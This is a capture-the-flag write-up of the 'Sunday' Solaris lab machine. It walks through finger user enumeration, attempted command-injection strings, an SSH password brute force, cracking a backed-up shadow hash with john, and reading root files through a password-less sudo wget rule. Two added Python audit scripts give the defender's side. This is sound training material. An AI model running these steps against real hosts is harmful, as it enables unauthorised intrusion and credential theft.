Sunday

Enumeration Stage

NMAP

There is a firewall that is filtering our requests. To bypass it I have run the script with the displayed tags. The service scan reveals five open ports.

# nmap -p- 10.10.10.76 -sV -sC -T4 
PORT      STATE SERVICE VERSION
79/tcp    open  finger  Sun Solaris fingerd
|_finger: No one logged on\x0D
111/tcp   open  rpcbind 2-4 (RPC #100000)
22022/tcp open  ssh     SunSSH 1.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 d2:e5:cb:bd:33:c7:01:31:0b:3c:63:d9:82:d9:f1:4e (DSA)
|_  1024 e4:2c:80:62:cf:15:17:79:ff:72:9d:df:8b:a6:c9:ac (RSA)
44060/tcp open  unknown
44273/tcp open  rpcbind
Service Info: OS: Solaris; CPE: cpe:/o:sun:sunos

Port 79/tcp finger

Finger is a program you can use to find information about computer users. It usually lists the login name, the full name, and possibly other details about the user you are fingering. These details may include the office location and phone number (if known), login time, idle time, time mail was last read, and the user’s plan and project files.

This website (hacktricks.xyz) reveals really cool information on the service and ways to exploit it.

# finger [email protected]
Login       Name               TTY         Idle    When    Where
xvm      xVM User                           < .  .  .  . >
openldap OpenLDAP User                      < .  .  .  . >
nobody   NFS Anonymous Access               < .  .  .  . >
noaccess No Access User                     < .  .  .  . >
nobody4  SunOS 4.x NFS Anonym               < .  .  .  . >

Metasploit finger user enumeration

We have already enumerated some users, but it doesn’t hurt to try the Metasploit module too. From the output we understand that there is a “sunny” and a mysql user too.

msf6 auxiliary(scanner/finger/finger_users) > run

[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: sunny
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: adm
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: lp
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: uucp
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: nuucp
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: dladm
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: listen
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: bin
[+] 10.10.10.76:79        - 10.10.10.76:79 Users found: adm, bin, dladm, listen, lp, nuucp, sunny, uucp
[*] 10.10.10.76:79        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Command injection test

The command injection failed but I am putting it here for you to know that it may exist in other cases.

# finger "/bin/ls -a /@10.10.10.76"
Login       Name               TTY         Idle    When    Where
/bin/ls               ???
-a                    ???
/                     ???

# finger "|[email protected]"         
Login       Name               TTY         Idle    When    Where
|ls                   ???

Port 111/tcp portmapper

In networks protected by firewalls and other mechanisms, access to the RPC portmapper service running on port 111 is often filtered. Therefore, determined attackers can scan high port ranges (UDP and TCP ports 32771 through 34000 on Solaris hosts) to identify RPC services that are open to direct attack.

You can run nmap with the -sR option to identify RPC services listening on high ports if the portmapper is inaccessible. Note that the -sR option is deprecated and -sV runs instead.

Bruteforcing ssh service

Found password “sunday”.

# hydra -I -l sunny -P /home/kali/passwords.txt -t 16 -s 22022 ssh://10.10.10.76
[DATA] attacking ssh://10.10.10.76:22022/
[22022][ssh] host: 10.10.10.76 login: sunny password: sunday
1 of 1 target successfully completed, 1 valid password found

Privilege Escalation

Logging in through SSH using sunny:sunday as username:password.

# ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 [email protected] -p 22022
Password: 
Last login: Tue Apr 24 10:48:11 2018 from 10.10.14.4
Sun Microsystems Inc.   SunOS 5.11      snv_111b        November 2008
[email protected]:~$ 

Weird file

[email protected]:/tmp$ cat ogl_select253 
SUNWtext mesa
NVDAnvda nvidia

Path poison attempt

Upon logging in, I tried sudo -l and saw that /root/troll does not require a password to run. After running it, my guess is that it invokes a system call “id”. Therefore I am copying /bin/bash to a file named “id” and prepending its directory to PATH, so that when “id” is invoked root will run /bin/bash and I should privesc. Unfortunately, the attempt is unsuccessful.

[email protected]:/usr/share$ sudo -l                                                                                    
User sunny may run the following commands on this host:
    (root) NOPASSWD: /root/troll

[email protected]:/usr/share$ sudo /root/troll
testing
uid=0(root) gid=0(root)

[email protected]:/tmp/$ cp /bin/bash /tmp/id
[email protected]:/tmp/$ chmod 777 id
[email protected]:/tmp/$ echo $PATH
/usr/gnu/bin:/usr/bin:/usr/X11/bin:/usr/sbin:/sbin
[email protected]:/tmp/$ export PATH=/tmp:$PATH
[email protected]:/tmp/$ sudo /root/troll
testing
uid=0(root) gid=0(root)

I have discovered a backup shadow file containing sammy’s pass hash.

[email protected]:/backup$ cat shadow.backup
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::

By using john, I have managed to extract the password from the hash. username:password == sammy:cooldude!

# john crack.txt --wordlist=/usr/share/wordlists/rockyou.txt       
Using default input encoding: UTF-8
Loaded 1 password hash (sha256crypt, crypt(3) $5$ [SHA256 128/128 AVX 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:26 0.74% (ETA: 12:51:05) 0g/s 4771p/s 4771c/s 4771C/s dtown214..balls2
cooldude!        (sammy)

[deleted]
Session completed
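
From the defender's side, the finding here is a readable copy of the shadow file. The following is an added example, not part of the original write-up: a small audit that classifies each entry of a shadow-format file the way the listing above reads (NP, *LK*, or a `$5$` hash) and reports which accounts have a hash exposed to offline guessing, including the sha256crypt default of 5000 rounds that john reports. The function names and the sample data are constructed for this example.

```python
from datetime import date, timedelta

# Constructed sample in the format of the listing above. The salt and digest
# strings are placeholders, not real password hashes.
SAMPLE = """\
mysql:NP:::::::
webservd:*LK*:::::::
nobody:*LK*:6445::::::
alice:$5$SALTSALT$PLACEHOLDERDIGESTPLACEHOLDERDIGEST000000000:17636::::::
bob:$5$rounds=20000$SALTSALT$PLACEHOLDERDIGESTPLACEHOLDERDIGEST000000000:17636::::::
"""

CRYPT_IDS = {"1": "md5crypt", "2a": "bcrypt", "5": "sha256crypt", "6": "sha512crypt"}
DEFAULT_ROUNDS = {"5": 5000, "6": 5000}  # applies when no rounds= field is present

def parse_entry(line):
    """Classify one shadow line as no-password, locked, empty or a crypt(3) hash."""
    fields = line.strip().split(":")
    user, pw = fields[0], fields[1]
    lastchg = fields[2] if len(fields) > 2 else ""
    entry = {"user": user, "state": "hash", "scheme": "unknown",
             "rounds": None, "changed": None}
    if lastchg.isdigit():  # field 3 counts days since 1970-01-01
        entry["changed"] = date(1970, 1, 1) + timedelta(days=int(lastchg))
    if pw == "NP":
        entry["state"] = "no-password"
    elif pw == "":
        entry["state"] = "empty"
    elif pw.startswith(("*", "!")):  # covers the Solaris *LK* marker
        entry["state"] = "locked"
    elif pw.startswith("$") and pw.count("$") >= 3:
        parts = pw.split("$")  # ['', id, optional rounds=N, salt, digest]
        entry["scheme"] = CRYPT_IDS.get(parts[1], "unknown")
        if parts[2].startswith("rounds="):
            entry["rounds"] = int(parts[2][len("rounds="):])
        else:
            entry["rounds"] = DEFAULT_ROUNDS.get(parts[1])
    return entry

def exposed_hashes(text):
    """Accounts whose hash is open to offline guessing by any reader of the copy."""
    entries = [parse_entry(ln) for ln in text.splitlines() if ln.strip()]
    return [e for e in entries if e["state"] == "hash"]

if __name__ == "__main__":
    for e in exposed_hashes(SAMPLE):
        print(e["user"], e["scheme"], e["rounds"], e["changed"])
```

Any account this reports from a copy outside /etc/shadow needs a password reset, and the copy itself should be removed or restricted to root.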

Changing user to sammy. I once again ran the mandatory initial “sudo -l” test and received a NOPASSWD entry for /usr/bin/wget. According to GTFOBins, we can escalate privileges by downloading our own file and saving it on the victim (such as shadow), or simply use wget to read out files.

[email protected]:/tmp$ sudo -l
User sammy may run the following commands on this host:
    (root) NOPASSWD: /usr/bin/wget
[email protected]:/tmp$ LFILE=/root/root.txt
[email protected]:/tmp$ sudo wget -i $LFILE
/root/root.txt: Invalid URL <fb40..ROOT FLAG>: Unsupported scheme
No URLs found in /root/root.txt.
[email protected]:/tmp$
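
The sudo rules are the root cause of both escalation paths in this section. The following is an added example, not part of the original write-up: an audit that reads `sudo -l` output in the format shown above and flags password-less rules, separating general-purpose tools that can read or write caller-chosen files (as wget did here) from rules that merely need review. The `FILE_CAPABLE` list and the verdict labels are assumptions of this example.

```python
import os
import re

# Illustrative subset of general-purpose programs that can read or write files
# chosen by the caller (assumption of this example, not a complete catalogue).
FILE_CAPABLE = {"wget", "curl", "vi", "vim", "less", "more", "tar", "find", "awk", "cp"}

# Matches rule lines such as "    (root) NOPASSWD: /usr/bin/wget".
RULE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")

# The two `sudo -l` listings shown on this page.
SUNNY = """User sunny may run the following commands on this host:
    (root) NOPASSWD: /root/troll
"""
SAMMY = """User sammy may run the following commands on this host:
    (root) NOPASSWD: /usr/bin/wget
"""

def audit(sudo_l_output):
    """Return (command, verdict) for every rule that needs no password."""
    findings = []
    for line in sudo_l_output.splitlines():
        m = RULE.match(line)
        if not m:
            continue  # header lines and anything that is not a rule
        tags = {t.strip() for t in m["tags"].split(":") if t.strip()}
        if "NOPASSWD" not in tags:
            continue
        for cmd in filter(None, (c.strip() for c in m["cmds"].split(","))):
            binary = os.path.basename(cmd.split()[0])
            if cmd == "ALL":
                verdict = "unrestricted"      # equivalent to a root shell
            elif binary in FILE_CAPABLE:
                verdict = "file-capable"      # replace with a narrow wrapper
            elif " " not in cmd:
                verdict = "unpinned-args"     # any arguments are accepted
            else:
                verdict = "pinned-args"       # still check for wildcards
            findings.append((cmd, verdict))
    return findings

if __name__ == "__main__":
    for listing in (SUNNY, SAMMY):
        print(audit(listing))
```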

The system is quite interesting: it taught us about bypassing firewall rules and advanced nmap enumeration, as well as the finger service and how we could extract usernames through it. We were also introduced to some basic privesc with wget, cronjobs, path poisoning and others. We did some password cracking with john, escalated to a second user and then to root. Overall, a neat experience was provided to us. Peace!
